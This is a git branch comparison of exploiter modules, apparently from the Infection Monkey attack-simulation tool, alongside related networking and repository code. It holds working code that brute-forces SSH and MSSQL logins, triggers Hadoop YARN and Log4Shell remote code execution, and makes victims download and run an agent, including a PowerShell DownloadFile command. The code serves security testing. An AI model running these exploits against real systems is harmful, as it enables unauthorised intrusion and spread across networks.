Compare commits

..

No commits in common. "develop" and "2269-publish-events-from-powershell-exploiter" have entirely different histories.

22 changed files with 553 additions and 1112 deletions

View File

@ -1,13 +0,0 @@
import json
data = {
'name' : 'myname',
'age' : 100,
}
# separators:是分隔符的意思参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符后面的空格都除去了.
# dumps 将python对象字典转换为json字符串
json_str = json.dumps(data, separators=(',', ':'))
print(type(json_str), json_str)
# loads 将json字符串转化为python对象字典
pyton_obj = json.loads(json_str)
print(type(pyton_obj), pyton_obj)

View File

@ -5,20 +5,13 @@
"""
import json
import logging
import posixpath
import random
import string
from time import time
import requests
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.tags import (
T1105_ATTACK_TECHNIQUE_TAG,
T1203_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE
@ -30,10 +23,6 @@ from infection_monkey.model import (
)
from infection_monkey.utils.commands import build_monkey_commandline
logger = logging.getLogger(__name__)
HADOOP_EXPLOITER_TAG = "hadoop-exploiter"
class HadoopExploiter(WebRCE):
_EXPLOITED_SERVICE = "Hadoop"
@ -43,43 +32,39 @@ class HadoopExploiter(WebRCE):
# Random string's length that's used for creating unique app name
RAN_STR_LEN = 6
_EXPLOITER_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
_PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
def __init__(self):
super(HadoopExploiter, self).__init__()
def _exploit_host(self):
# Try to get potential urls
potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
if not potential_urls:
self.exploit_result.error_message = (
f"No potential exploitable urls has been found for {self.host}"
)
# Try to get exploitable url
urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
return self.exploit_result
monkey_path_on_victim = get_agent_dst_path(self.host)
try:
monkey_path_on_victim = get_agent_dst_path(self.host)
except KeyError:
return self.exploit_result
http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(monkey_path_on_victim), self.agent_binary_repository
)
command = self._build_command(monkey_path_on_victim, http_path)
try:
for url in potential_urls:
if self.exploit(url, command):
self.add_executed_cmd(command)
self.exploit_result.exploitation_success = True
self.exploit_result.propagation_success = True
break
command = self._build_command(monkey_path_on_victim, http_path)
if self.exploit(self.vulnerable_urls[0], command):
self.add_executed_cmd(command)
self.exploit_result.exploitation_success = True
self.exploit_result.propagation_success = True
finally:
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()
return self.exploit_result
def exploit(self, url: str, command: str):
def exploit(self, url, command):
if self._is_interrupted():
self._set_interrupted()
return False
@ -88,8 +73,8 @@ class HadoopExploiter(WebRCE):
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
)
resp_dict = json.loads(resp.content)
app_id = resp_dict["application-id"]
resp = json.loads(resp.content)
app_id = resp["application-id"]
# Create a random name for our application in YARN
# random.SystemRandom can block indefinitely in Linux
@ -102,16 +87,10 @@ class HadoopExploiter(WebRCE):
self._set_interrupted()
return False
timestamp = time()
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
)
success = resp.status_code == 202
message = "" if success else f"Failed to exploit via {url}"
self._publish_exploitation_event(timestamp, success, error_message=message)
self._publish_propagation_event(timestamp, success, error_message=message)
return success
return resp.status_code == 202
def check_if_exploitable(self, url):
try:

View File

@ -4,11 +4,6 @@ from pathlib import PurePath
from common import OperatingSystem
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.tags import (
T1105_ATTACK_TECHNIQUE_TAG,
T1110_ATTACK_TECHNIQUE_TAG,
T1203_ATTACK_TECHNIQUE_TAG,
)
from common.utils import Timer
from infection_monkey.exploit.log4shell_utils import (
LINUX_EXPLOIT_TEMPLATE_PATH,
@ -31,26 +26,12 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__)
LOG4SHELL_EXPLOITER_TAG = "log4shell-exploiter"
VICTIM_WAIT_SLEEP_TIME_SEC = 0.050
class Log4ShellExploiter(WebRCE):
_EXPLOITED_SERVICE = "Log4j"
SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT
REQUEST_TO_VICTIM_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
_EXPLOITER_TAGS = (
LOG4SHELL_EXPLOITER_TAG,
T1110_ATTACK_TECHNIQUE_TAG,
T1203_ATTACK_TECHNIQUE_TAG,
)
_PROPAGATION_TAGS = (
LOG4SHELL_EXPLOITER_TAG,
T1203_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
)
def _exploit_host(self) -> ExploiterResultData:
self._open_ports = [
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
@ -165,37 +146,24 @@ class Log4ShellExploiter(WebRCE):
f"on port {port}"
)
try:
timestamp = time.time()
url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
except Exception as err:
error_message = (
except Exception as ex:
logger.warning(
"An error occurred while attempting to exploit log4shell on a "
f"potential {exploit.service_name} service: {err}"
f"potential {exploit.service_name} service: {ex}"
)
logger.warning(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
# TODO: _wait_for_victim() gets called even if trigger_exploit() raises an
# exception. Is that the desired behavior?
if self._wait_for_victim(timestamp):
if self._wait_for_victim():
self.exploit_info["vulnerable_service"] = {
"service_name": exploit.service_name,
"port": port,
}
self.exploit_info["vulnerable_urls"].append(url)
def _wait_for_victim(self, timestamp: float) -> bool:
def _wait_for_victim(self) -> bool:
victim_called_back = self._wait_for_victim_to_download_java_bytecode()
if victim_called_back:
self._publish_exploitation_event(timestamp, True)
victim_downloaded_agent = self._wait_for_victim_to_download_agent()
self._publish_propagation_event(success=victim_downloaded_agent)
else:
error_message = "Timed out while waiting for victim to download the java bytecode"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
self._wait_for_victim_to_download_agent()
return victim_called_back
@ -208,20 +176,19 @@ class Log4ShellExploiter(WebRCE):
self.exploit_result.exploitation_success = True
return True
time.sleep(VICTIM_WAIT_SLEEP_TIME_SEC)
time.sleep(1)
logger.debug("Timed out while waiting for victim to download the java bytecode")
return False
def _wait_for_victim_to_download_agent(self) -> bool:
def _wait_for_victim_to_download_agent(self):
timer = Timer()
timer.set(LONG_REQUEST_TIMEOUT)
while not timer.is_expired():
if self._agent_http_server_thread.downloads > 0:
self.exploit_result.propagation_success = True
return True
break
# TODO: if the http server got an error we're waiting for nothing here
time.sleep(VICTIM_WAIT_SLEEP_TIME_SEC)
return False
time.sleep(1)

View File

@ -1,18 +1,12 @@
import logging
from pathlib import PureWindowsPath
from time import sleep, time
from typing import Iterable, Optional, Tuple
from time import sleep
from typing import Sequence, Tuple
import pymssql
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.credentials import get_plaintext
from common.tags import (
T1059_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
T1110_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
from common.utils.exceptions import FailedExploitationError
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
@ -26,8 +20,6 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__)
MSSQL_EXPLOITER_TAG = "mssql-exploiter"
class MSSQLExploiter(HostExploiter):
_EXPLOITED_SERVICE = "MSSQL"
@ -44,20 +36,13 @@ class MSSQLExploiter(HostExploiter):
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
)
_EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
_PROPAGATION_TAGS = (
MSSQL_EXPLOITER_TAG,
T1059_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
)
def __init__(self):
super().__init__()
self.cursor = None
self.agent_http_path = None
def _exploit_host(self) -> ExploiterResultData:
agent_path_on_victim = PureWindowsPath(get_agent_dst_path(self.host))
agent_path_on_victim = get_agent_dst_path(self.host)
# Brute force to get connection
creds = generate_identity_secret_pairs(
@ -67,18 +52,16 @@ class MSSQLExploiter(HostExploiter):
try:
self.cursor = self._brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds)
except FailedExploitationError:
error_message = (
logger.info(
f"Failed brute-forcing of MSSQL server on {self.host},"
f" no credentials were successful"
)
logger.error(error_message)
return self.exploit_result
if self._is_interrupted():
self._set_interrupted()
return self.exploit_result
timestamp = time()
try:
self._upload_agent(agent_path_on_victim)
self._run_agent(agent_path_on_victim)
@ -89,17 +72,15 @@ class MSSQLExploiter(HostExploiter):
)
logger.error(error_message)
self._publish_propagation_event(timestamp, False, error_message=error_message)
self.exploit_result.error_message = error_message
return self.exploit_result
self._publish_propagation_event(timestamp, True)
self.exploit_result.propagation_success = True
return self.exploit_result
def _brute_force(
self, host: str, port: str, users_passwords_pairs_list: Iterable[Tuple[str, str]]
self, host: str, port: str, users_passwords_pairs_list: Sequence[Tuple[str, str]]
) -> pymssql.Cursor:
"""
Starts the brute force connection attempts and if needed then init the payload process.
@ -125,7 +106,6 @@ class MSSQLExploiter(HostExploiter):
)
for user, password in credentials_iterator:
timestamp = time()
try:
# Core steps
# Trying to connect
@ -142,14 +122,14 @@ class MSSQLExploiter(HostExploiter):
)
self.exploit_result.exploitation_success = True
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self._report_login_attempt(timestamp, True, user, password)
self.report_login_attempt(True, user, password)
cursor = conn.cursor()
return cursor
except pymssql.OperationalError as err:
error_message = f"Connection to MSSQL failed: {err}"
logger.info(error_message)
self._report_login_attempt(timestamp, False, user, password, error_message)
logger.info(f"Connection to MSSQL failed: {err}")
self.report_login_attempt(False, user, password)
# Combo didn't work, hopping to the next one
pass
logger.warning(
"No user/password combo was able to connect to host: {0}:{1}, "
@ -159,23 +139,14 @@ class MSSQLExploiter(HostExploiter):
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
)
def _report_login_attempt(
self, timestamp: float, success: bool, user, password: str, message: str = ""
):
self._publish_exploitation_event(timestamp, success, error_message=message)
self.report_login_attempt(success, user, password)
def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
http_thread = self._start_agent_server(agent_path_on_victim)
self._run_agent_download_command(agent_path_on_victim)
if http_thread:
MSSQLExploiter._stop_agent_server(http_thread)
MSSQLExploiter._stop_agent_server(http_thread)
def _start_agent_server(
self, agent_path_on_victim: PureWindowsPath
) -> Optional[LockedHTTPServer]:
def _start_agent_server(self, agent_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(agent_path_on_victim), self.agent_binary_repository
)
@ -208,7 +179,7 @@ class MSSQLExploiter(HostExploiter):
def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
agent_args = build_monkey_commandline(
self.servers, self.current_depth + 1, str(agent_path_on_victim)
self.servers, self.current_depth + 1, agent_path_on_victim
)
return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"

View File

@ -43,7 +43,7 @@ def format_password(credentials: Credentials) -> Optional[str]:
if credentials.secret_type == SecretType.CACHED:
return None
plaintext_secret = str(get_plaintext(credentials.secret))
plaintext_secret = get_plaintext(credentials.secret)
if credentials.secret_type == SecretType.PASSWORD:
return plaintext_secret

View File

@ -1,27 +1,15 @@
import io
import logging
from ipaddress import IPv4Address
from pathlib import PurePath
from time import time
from typing import Optional
import paramiko
from common import OperatingSystem
from common.agent_events import TCPScanEvent
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.credentials import get_plaintext
from common.tags import (
T1021_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
T1110_ATTACK_TECHNIQUE_TAG,
T1222_ATTACK_TECHNIQUE_TAG,
)
from common.types import PortStatus
from common.utils import Timer
from common.utils.attack_utils import ScanStatus
from common.utils.exceptions import FailedExploitationError
from infection_monkey.exploit import RetrievalError
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.i_puppet import ExploiterResultData
@ -31,7 +19,6 @@ from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
from infection_monkey.utils.brute_force import generate_identity_secret_pairs
from infection_monkey.utils.commands import build_monkey_commandline
from infection_monkey.utils.ids import get_agent_id
from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__)
@ -43,15 +30,11 @@ SSH_EXEC_TIMEOUT = LONG_REQUEST_TIMEOUT
SSH_CHANNEL_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
TRANSFER_UPDATE_RATE = 15
SSH_EXPLOITER_TAG = "ssh-exploiter"
class SSHExploiter(HostExploiter):
_EXPLOITED_SERVICE = "SSH"
_EXPLOITER_TAGS = (SSH_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG)
_PROPAGATION_TAGS = (SSH_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1222_ATTACK_TECHNIQUE_TAG)
def __init__(self):
super(SSHExploiter, self).__init__()
@ -63,7 +46,7 @@ class SSHExploiter(HostExploiter):
logger.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
timer.reset()
def exploit_with_ssh_keys(self, port: int) -> paramiko.SSHClient:
def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
user_ssh_key_pairs = generate_identity_secret_pairs(
identities=self.options["credentials"]["exploit_user_list"],
secrets=self.options["credentials"]["exploit_ssh_keys"],
@ -87,8 +70,6 @@ class SSHExploiter(HostExploiter):
pkey = paramiko.RSAKey.from_private_key(pkey)
except (IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
logger.error("Failed reading ssh key")
timestamp = time()
try:
ssh.connect(
self.host.ip_addr,
@ -105,30 +86,20 @@ class SSHExploiter(HostExploiter):
)
self.add_vuln_port(port)
self.exploit_result.exploitation_success = True
self._publish_exploitation_event(timestamp, True)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh
except paramiko.AuthenticationException as err:
ssh.close()
error_message = (
f"Failed logging into victim {self.host} with {ssh_string} private key: {err}"
logger.info(
f"Failed logging into victim {self.host} with {ssh_string} private key: {err}",
)
logger.info(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
self.report_login_attempt(False, user, ssh_key=ssh_string)
continue
except Exception as err:
error_message = (
f"Unexpected error while attempting to login to {ssh_string} with ssh key: "
f"{err}"
)
logger.error(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
self.report_login_attempt(False, user, ssh_key=ssh_string)
logger.error(f"Unknown error while attempting to login with ssh key: {err}")
raise FailedExploitationError
def exploit_with_login_creds(self, port: int) -> paramiko.SSHClient:
def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
user_password_pairs = generate_identity_secret_pairs(
identities=self.options["credentials"]["exploit_user_list"],
secrets=self.options["credentials"]["exploit_password_list"],
@ -145,8 +116,6 @@ class SSHExploiter(HostExploiter):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
timestamp = time()
try:
ssh.connect(
self.host.ip_addr,
@ -162,79 +131,108 @@ class SSHExploiter(HostExploiter):
logger.debug("Successfully logged in %r using SSH. User: %s", self.host, user)
self.add_vuln_port(port)
self.exploit_result.exploitation_success = True
self._publish_exploitation_event(timestamp, True)
self.report_login_attempt(True, user, current_password)
return ssh
except paramiko.AuthenticationException as err:
error_message = f"Failed logging into victim {self.host} with user: {user}: {err}"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
logger.debug(
"Failed logging into victim %r with user" " %s: (%s)",
self.host,
user,
err,
)
self.report_login_attempt(False, user, current_password)
ssh.close()
continue
except Exception as err:
error_message = (
f"Unexpected error while attempting to login to {self.host} with password: "
f"{err}"
)
logger.error(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
self.report_login_attempt(False, user, current_password)
logger.error(f"Unknown error occurred while trying to login to ssh: {err}")
raise FailedExploitationError
def _exploit_host(self) -> ExploiterResultData:
port = self._get_ssh_port()
port = SSH_PORT
if not self._is_port_open(IPv4Address(self.host.ip_addr), port):
# if ssh banner found on different port, use that port.
for servkey, servdata in list(self.host.services.items()):
if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
port = int(servkey.replace("tcp-", ""))
is_open, _ = check_tcp_port(self.host.ip_addr, port)
if not is_open:
self.exploit_result.error_message = f"SSH port is closed on {self.host}, skipping"
logger.info(self.exploit_result.error_message)
return self.exploit_result
try:
ssh = self._exploit(port)
except FailedExploitationError as err:
self.exploit_result.error_message = str(err)
logger.error(self.exploit_result.error_message)
return self.exploit_result
if self._is_interrupted():
self._set_interrupted()
return self.exploit_result
try:
self._propagate(ssh)
except (FailedExploitationError, RuntimeError) as err:
self.exploit_result.error_message = str(err)
logger.error(self.exploit_result.error_message)
finally:
ssh.close()
return self.exploit_result
def _exploit(self, port: int) -> paramiko.SSHClient:
try:
ssh = self.exploit_with_ssh_keys(port)
except FailedExploitationError:
try:
ssh = self.exploit_with_login_creds(port)
except FailedExploitationError:
raise FailedExploitationError("Exploiter SSHExploiter is giving up...")
return ssh
def _propagate(self, ssh: paramiko.SSHClient):
agent_binary_file_object = self._get_agent_binary(ssh)
if agent_binary_file_object is None:
raise RuntimeError("Can't find suitable monkey executable for host {self.host}")
self.exploit_result.error_message = "Exploiter SSHExploiter is giving up..."
logger.error(self.exploit_result.error_message)
return self.exploit_result
if self._is_interrupted():
self._set_interrupted()
raise RuntimeError("Propagation was interrupted")
return self.exploit_result
if not self.host.os.get("type"):
try:
_, stdout, _ = ssh.exec_command("uname -o", timeout=SSH_EXEC_TIMEOUT)
uname_os = stdout.read().lower().strip().decode()
if "linux" in uname_os:
self.exploit_result.os = OperatingSystem.LINUX
self.host.os["type"] = OperatingSystem.LINUX
else:
self.exploit_result.error_message = f"SSH Skipping unknown os: {uname_os}"
if not uname_os:
logger.error(self.exploit_result.error_message)
return self.exploit_result
except Exception as exc:
self.exploit_result.error_message = (
f"Error running uname os command on victim {self.host}: ({exc})"
)
logger.error(self.exploit_result.error_message)
return self.exploit_result
agent_binary_file_object = self.agent_binary_repository.get_agent_binary(
self.exploit_result.os
)
if not agent_binary_file_object:
self.exploit_result.error_message = (
f"Can't find suitable monkey executable for host {self.host}"
)
logger.error(self.exploit_result.error_message)
return self.exploit_result
if self._is_interrupted():
self._set_interrupted()
return self.exploit_result
monkey_path_on_victim = get_agent_dst_path(self.host)
status = self._upload_agent_binary(ssh, agent_binary_file_object, monkey_path_on_victim)
try:
with ssh.open_sftp() as ftp:
ftp.putfo(
agent_binary_file_object,
str(monkey_path_on_victim),
file_size=len(agent_binary_file_object.getbuffer()),
callback=self.log_transfer,
)
self._set_executable_bit_on_agent_binary(ftp, monkey_path_on_victim)
status = ScanStatus.USED
except Exception as exc:
self.exploit_result.error_message = (
f"Error uploading file into victim {self.host}: ({exc})"
)
logger.error(self.exploit_result.error_message)
status = ScanStatus.SCANNED
self.telemetry_messenger.send_telemetry(
T1105Telem(
@ -244,15 +242,13 @@ class SSHExploiter(HostExploiter):
monkey_path_on_victim,
)
)
if status == ScanStatus.SCANNED:
raise FailedExploitationError(self.exploit_result.error_message)
return self.exploit_result
try:
cmdline = f"{monkey_path_on_victim} {MONKEY_ARG}"
cmdline += build_monkey_commandline(self.servers, self.current_depth + 1)
cmdline += " > /dev/null 2>&1 &"
timestamp = time()
ssh.exec_command(cmdline, timeout=SSH_EXEC_TIMEOUT)
logger.info(
@ -263,87 +259,18 @@ class SSHExploiter(HostExploiter):
)
self.exploit_result.propagation_success = True
self._publish_propagation_event(timestamp, True)
ssh.close()
self.add_executed_cmd(cmdline)
return self.exploit_result
except Exception as exc:
error_message = f"Error running monkey on victim {self.host}: ({exc})"
self._publish_propagation_event(timestamp, False, error_message=error_message)
raise FailedExploitationError(error_message)
def _is_port_open(self, ip: IPv4Address, port: int) -> bool:
is_open, _ = check_tcp_port(ip, port)
status = PortStatus.OPEN if is_open else PortStatus.CLOSED
self.agent_event_queue.publish(
TCPScanEvent(source=get_agent_id(), target=ip, ports={port: status})
)
return is_open
def _get_ssh_port(self) -> int:
port = SSH_PORT
# if ssh banner found on different port, use that port.
for servkey, servdata in list(self.host.services.items()):
if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
port = int(servkey.replace("tcp-", ""))
return port
def _get_victim_os(self, ssh: paramiko.SSHClient) -> bool:
try:
_, stdout, _ = ssh.exec_command("uname -o", timeout=SSH_EXEC_TIMEOUT)
uname_os = stdout.read().lower().strip().decode()
if "linux" in uname_os:
self.exploit_result.os = OperatingSystem.LINUX
self.host.os["type"] = OperatingSystem.LINUX
else:
self.exploit_result.error_message = f"SSH Skipping unknown os: {uname_os}"
if not uname_os:
logger.error(self.exploit_result.error_message)
return False
except Exception as exc:
logger.error(f"Error running uname os command on victim {self.host}: ({exc})")
return False
return True
def _get_agent_binary(self, ssh: paramiko.SSHClient) -> Optional[io.BytesIO]:
if not self.host.os.get("type") and not self._get_victim_os(ssh):
return None
try:
agent_binary_file_object = self.agent_binary_repository.get_agent_binary(
self.exploit_result.os
self.exploit_result.error_message = (
f"Error running monkey on victim {self.host}: ({exc})"
)
except RetrievalError:
return None
return agent_binary_file_object
def _upload_agent_binary(
self,
ssh: paramiko.SSHClient,
agent_binary_file_object: io.BytesIO,
monkey_path_on_victim: PurePath,
) -> ScanStatus:
try:
timestamp = time()
with ssh.open_sftp() as ftp:
ftp.putfo(
agent_binary_file_object,
str(monkey_path_on_victim),
file_size=len(agent_binary_file_object.getbuffer()),
callback=self.log_transfer,
)
self._set_executable_bit_on_agent_binary(ftp, monkey_path_on_victim)
return ScanStatus.USED
except Exception as exc:
error_message = f"Error uploading file into victim {self.host}: ({exc})"
self._publish_propagation_event(timestamp, False, error_message=error_message)
self.exploit_result.error_message = error_message
return ScanStatus.SCANNED
logger.error(self.exploit_result.error_message)
return self.exploit_result
def _set_executable_bit_on_agent_binary(
self, ftp: paramiko.sftp_client.SFTPClient, monkey_path_on_victim: PurePath

View File

@ -3,7 +3,6 @@ import urllib.error
import urllib.parse
import urllib.request
from threading import Lock
from typing import Optional, Tuple
from infection_monkey.network.firewall import app as firewall
from infection_monkey.network.info import get_free_tcp_port
@ -29,7 +28,7 @@ class HTTPTools(object):
@staticmethod
def create_locked_transfer(
host, dropper_target_path, agent_binary_repository, local_ip=None, local_port=None
) -> Tuple[Optional[str], Optional[LockedHTTPServer]]:
) -> LockedHTTPServer:
"""
Create http server for file transfer with a lock
:param host: Variable with target's information

View File

@ -3,8 +3,6 @@ import select
import socket
import struct
import sys
from ipaddress import IPv4Address
from typing import Optional
from common.common_consts.timeouts import CONNECTION_TIMEOUT
from infection_monkey.network.info import get_routes
@ -15,7 +13,7 @@ BANNER_READ = 1024
logger = logging.getLogger(__name__)
def check_tcp_port(ip: IPv4Address, port: int, timeout=DEFAULT_TIMEOUT, get_banner=False):
def check_tcp_port(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
"""
Checks if a given TCP port is open
:param ip: Target IP
@ -28,7 +26,7 @@ def check_tcp_port(ip: IPv4Address, port: int, timeout=DEFAULT_TIMEOUT, get_bann
sock.settimeout(timeout)
try:
sock.connect((str(ip), port))
sock.connect((ip, port))
except socket.timeout:
return False, None
except socket.error as exc:
@ -53,7 +51,7 @@ def tcp_port_to_service(port):
return "tcp-" + str(port)
def get_interface_to_target(dst: str) -> Optional[str]:
def get_interface_to_target(dst: str) -> str:
"""
:param dst: destination IP address string without port. E.G. '192.168.1.1.'
:return: IP address string of an interface that can connect to the target. E.G. '192.168.1.4.'

View File

@ -1,5 +1,4 @@
from pathlib import PurePath
from typing import List, Optional, Union
from typing import List, Optional
from infection_monkey.config import GUID
from infection_monkey.exploit.tools.helpers import AGENT_BINARY_PATH_LINUX, AGENT_BINARY_PATH_WIN64
@ -10,9 +9,7 @@ DROPPER_TARGET_PATH_LINUX = AGENT_BINARY_PATH_LINUX
DROPPER_TARGET_PATH_WIN64 = AGENT_BINARY_PATH_WIN64
def build_monkey_commandline(
servers: List[str], depth: int, location: Union[str, PurePath, None] = None
) -> str:
def build_monkey_commandline(servers: List[str], depth: int, location: Optional[str] = None) -> str:
return " " + " ".join(
build_monkey_commandline_explicitly(
@ -28,7 +25,7 @@ def build_monkey_commandline_explicitly(
parent: Optional[str] = None,
servers: Optional[List[str]] = None,
depth: Optional[int] = None,
location: Union[str, PurePath, None] = None,
location: Optional[str] = None,
) -> List[str]:
cmdline = []

View File

@ -5,8 +5,8 @@ from typing import Union
from typing_extensions import TypeAlias
from common.agent_events import PingScanEvent, TCPScanEvent
from common.types import PortStatus, SocketAddress
from monkey_island.cc.models import CommunicationType, Machine, Node
from common.types import PortStatus
from monkey_island.cc.models import CommunicationType, Machine
from monkey_island.cc.repository import (
IAgentRepository,
IMachineRepository,
@ -56,10 +56,8 @@ class ScanEventHandler:
try:
target_machine = self._get_target_machine(event)
source_node = self._get_source_node(event)
self._update_nodes(target_machine, event)
self._update_tcp_connections(source_node, target_machine, event)
except (RetrievalError, StorageError, UnknownRecordError):
logger.exception("Unable to process tcp scan data")
@ -75,14 +73,6 @@ class ScanEventHandler:
self._machine_repository.upsert_machine(machine)
return machine
def _get_source_node(self, event: ScanEvent) -> Node:
machine = self._get_source_machine(event)
return self._node_repository.get_node_by_machine_id(machine.id)
def _get_source_machine(self, event: ScanEvent) -> Machine:
agent = self._agent_repository.get_agent_by_id(event.source)
return self._machine_repository.get_machine_by_id(agent.machine_id)
def _update_target_machine_os(self, machine: Machine, event: PingScanEvent):
if event.os is not None and machine.operating_system is None:
machine.operating_system = event.os
@ -95,14 +85,6 @@ class ScanEventHandler:
src_machine.id, target_machine.id, CommunicationType.SCANNED
)
def _update_tcp_connections(self, src_node: Node, target_machine: Machine, event: TCPScanEvent):
tcp_connections = set()
open_ports = (port for port, status in event.ports.items() if status == PortStatus.OPEN)
for open_port in open_ports:
socket_address = SocketAddress(ip=event.target, port=open_port)
tcp_connections.add(socket_address)
if tcp_connections:
self._node_repository.upsert_tcp_connections(
src_node.machine_id, {target_machine.id: tuple(tcp_connections)}
)
def _get_source_machine(self, event: ScanEvent) -> Machine:
agent = self._agent_repository.get_agent_by_id(event.source)
return self._machine_repository.get_machine_by_id(agent.machine_id)

View File

@ -1,4 +1,4 @@
from typing import Dict, FrozenSet, Mapping, Tuple
from typing import FrozenSet, Mapping, Tuple
from pydantic import Field
from typing_extensions import TypeAlias
@ -9,7 +9,6 @@ from common.types import SocketAddress
from . import CommunicationType, MachineID
NodeConnections: TypeAlias = Mapping[MachineID, FrozenSet[CommunicationType]]
TCPConnections: TypeAlias = Dict[MachineID, Tuple[SocketAddress, ...]]
class Node(MutableInfectionMonkeyBaseModel):
@ -27,5 +26,5 @@ class Node(MutableInfectionMonkeyBaseModel):
connections: NodeConnections
"""All outbound connections from this node to other machines"""
tcp_connections: TCPConnections = {}
tcp_connections: Mapping[MachineID, Tuple[SocketAddress, ...]] = {}
"""All successfull outbound TCP connections"""

View File

@ -2,7 +2,6 @@ from abc import ABC, abstractmethod
from typing import Sequence
from monkey_island.cc.models import CommunicationType, MachineID, Node
from monkey_island.cc.models.node import TCPConnections
class INodeRepository(ABC):
@ -26,15 +25,6 @@ class INodeRepository(ABC):
:raises StorageError: If an error occurs while attempting to upsert the Node
"""
@abstractmethod
def upsert_tcp_connections(self, machine_id: MachineID, tcp_connections: TCPConnections):
"""
Add TCP connections to Node
:param machine_id: Machine ID of the Node that made the connections
:param tcp_connections: TCP connections made by node
:raises StorageError: If an error occurs while attempting to add connections
"""
@abstractmethod
def get_nodes(self) -> Sequence[Node]:
"""
@ -44,15 +34,6 @@ class INodeRepository(ABC):
:raises RetrievalError: If an error occurs while attempting to retrieve the nodes
"""
@abstractmethod
def get_node_by_machine_id(self, machine_id: MachineID) -> Node:
"""
Fetches network Node from the database based on Machine id
:param machine_id: ID of a Machine that Node represents
:return: network Node that represents the Machine
:raises UnknownRecordError: If the Node does not exist
"""
@abstractmethod
def reset(self):
"""

View File

@ -5,8 +5,7 @@ from pymongo import MongoClient
from monkey_island.cc.models import CommunicationType, MachineID, Node
from ..models.node import TCPConnections
from . import INodeRepository, RemovalError, RetrievalError, StorageError, UnknownRecordError
from . import INodeRepository, RemovalError, RetrievalError, StorageError
from .consts import MONGO_OBJECT_ID_KEY
UPSERT_ERROR_MESSAGE = "An error occurred while attempting to upsert a node"
@ -21,14 +20,19 @@ class MongoNodeRepository(INodeRepository):
self, src: MachineID, dst: MachineID, communication_type: CommunicationType
):
try:
node = self.get_node_by_machine_id(src)
node_dict = self._nodes_collection.find_one(
{SRC_FIELD_NAME: src}, {MONGO_OBJECT_ID_KEY: False}
)
except Exception as err:
raise StorageError(f"{UPSERT_ERROR_MESSAGE}: {err}")
if node_dict is None:
